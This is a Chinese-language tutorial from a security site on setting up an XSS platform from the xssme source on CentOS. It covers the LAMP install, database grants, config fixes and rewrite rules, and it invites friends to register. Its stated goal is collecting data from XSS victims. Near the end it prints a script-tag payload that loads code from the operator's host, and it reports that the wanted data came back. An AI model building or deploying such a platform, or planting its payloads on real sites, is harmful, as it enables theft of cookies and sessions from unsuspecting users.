栏目导航: 首页 > 检测提权 > 提权渗透 > 内容

linux下利用xssme源码 搭建xss平台

www.hx99.net    时间: 2014-08-27    阅读: 次     整理: 华西安全网

注: 教程实测,可以正常搭建成功,前提要有一定的linux  mysql基础,如果出现乱码就用dreamweaver编辑。 

这次xss平台搭建选用的是centos系统,其他linux也差不多。

下载源码:http://download.csdn.net/detail/baoribo2007/6009733 
0x01 LAMP环境的搭建
首先是下载apache的环境,centos已经集成好了。

然后当然是一大堆信息,最后显示Complete!成功了

然后安装php环境,可以解析php的内容。

OK,安装完毕,我们测试下,centos中安装完apache默认的网站根路径在/var/www/html/下,我们建立一个index.php文件作为测试:

使用vim打开,我们填入phpinfo函数

当然就是这样,打开HTTP服务测试页面:

有一个报错,是因为没有配置域名,只要在/etc/httpd/conf/httpd.conf文件中配置ServiceName就不会报错了。等下修改配置apache配置文件的时候一起截图。OK,测试一下,phpinfo的页面出来了

然后当然是数据库的支持,首先要下载mysql数据库

两个组件,一个mysql连接器一个服务器。
下载完数据库首先要将数据库初始化一下,

使用
service mysqld start 
首次启动mysql初始化,再使用
mysqladmin -u root password '密码'
给root设置一个密码。
OK数据库就安装完成,接着安装php对数据库的支持。

重启apache服务,刷新phpinfo页面




往下翻,找到这两个说明php和mysql已经连接完成了。LAMP环境搭建完毕。

0x02 让xss跑起来
上传xss的源码。并解压。

很简单的命令,你懂的。


OK,文件齐全,下面开始配置。
首先要给xss环境准备一个数据库和数据库的用户(当然也能用root,用root麻烦会少一点)
进入数据库配置:

mysql -u root -p
链接进入本地数据库。

创建了xss数据库和xsser用户,xsser用户的密码设定为123456
刚刚创建的xsser用户 是没有权限的。我们把xss数据库的所有权限赋给xsser。


GRANT ALL PRIVILEGES ON xss.* TO 'xsser'@'%' IDENTIFIED BY '123456';          //最好把@换成localhost
OK,数据库基础准备好了,我们去修改下config文件,让xss平台能和数据库交互。

用vim打开config.php

这里几个部分修改下。改完如下:

下面把xss平台的初始数据(xssplantform.sql文件)导入进我们的mysql

OK查看下数据库

都有了,当然,还差一个文件权限的问题。现在访问是空白

可以看到整个文件都是属于root的,所以我们改变下权限,让他属于apache的内建用户apache。



OK都是apache的了。
刷新下页面

到此我们的平台跑起来了。
0x03 蛋疼的调整们
当然,现在点注册还是没有效果的,还需要做一些修改
首先进入数据库,将oc_module中的内容改为自己的IP或域名

然后这里旧版本的源码需要把/var/www/html/themes/default/templates/register.html里面53行的button改为submit。


改完为了保险起见,把/var/www/html/templates_c/目录下的临时文件删除。重启httpd。

重新打开我们的网页,OK可以注册了。



但是这里注册的时候会出这样的问题。

好吧,这个问题我拍错的时候搞了半天,问题有点奇葩,先说解决方法吧,在config.php文件里面,将第九行的数据库地址改成localhost。

因为我搭建了不止一次,在写文章的时候把数据库地址改成127就报错,改成localhost就OK。当然,不排除改成localhost以后还会报错的情况,如果出现还报错的情况,我从我经验上来讲(因为没想通原理),用root用户连上数据库,加上这样一句话:
GRANT ALL PRIVILEGES ON xss.* TO 'xsser'@'localhost' IDENTIFIED BY '123456';
给数据库用户赋予一个本地登录权限,再进行测试,如果还是不行,把config.php文件里面的用户改成root用户,再测试。当然这里面的每一步修改都需要重启apache服务器。
别忘记命令:
service httpd restart
千辛万苦,终于看到了



0x04 这是最后....最后...

好,终于进入最后一步,测试XSS能否使用,并邀请小伙伴们注册。

来创建一个项目吧。



当然,我的项目代码在这里也显示了,复制出来
<script src=http://192.168.4.32/xssplatform/TNMaJe?1377587267></script>
测试一下:

打开它,看看x到没,哎呦我去,貌似没有- -。

分析一下

404了,想了下,可能是url重写的问题,在网站根目录下,创建一个.htaccess的隐藏文件

直接给出内容吧:

<IfModule mod_rewrite.c>
        RewriteEngine on
        RewriteRule ^([0-9a-zA-Z]{6})$ index.php?do=code&urlKey=$1
        RewriteRule ^do/auth/(\w+?)(/domain/([\w\.]+?))?$ index.php?do=do&auth=$1&domain=$3
        RewriteRule ^register/(.*?)$ index.php?do=register&key=$1 
        RewriteRule ^register-validate/(.*?)$ index.php?do=register&act=validate&key=$1
        RewriteRule ^login$ index.php?do=login
</IfModule>
还记得,去修改下/etc/httpd/conf/httpd.conf文件

搜索一下AllowOverride,应该是在这里,把None改成All。

重启下httpd服务,我们要开始了。


抓包显示访问都正常了

最想要的东西也回来了。
好东西怎么能一个人独享,赶快叫小伙伴们来加入吧。
将config.php文件改下:

还记得他吧,然后给我们自己的用户加上可以邀请的权限,连接下数据库,

好吧,为了测试我创建了很多用户,我们现在用的是nimei这个用户,需要把他的adminLevel权限改成1

UPDATE oc_user SET adminLevel=1 WHERE id=4;     //4就是nimei用户的ID
把自己的用户登出再登陆一下,访问
http://192.168.4.32/xssplatform/index.php?do=user&act=invite
这个页面

发给小伙伴,来注册吧

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭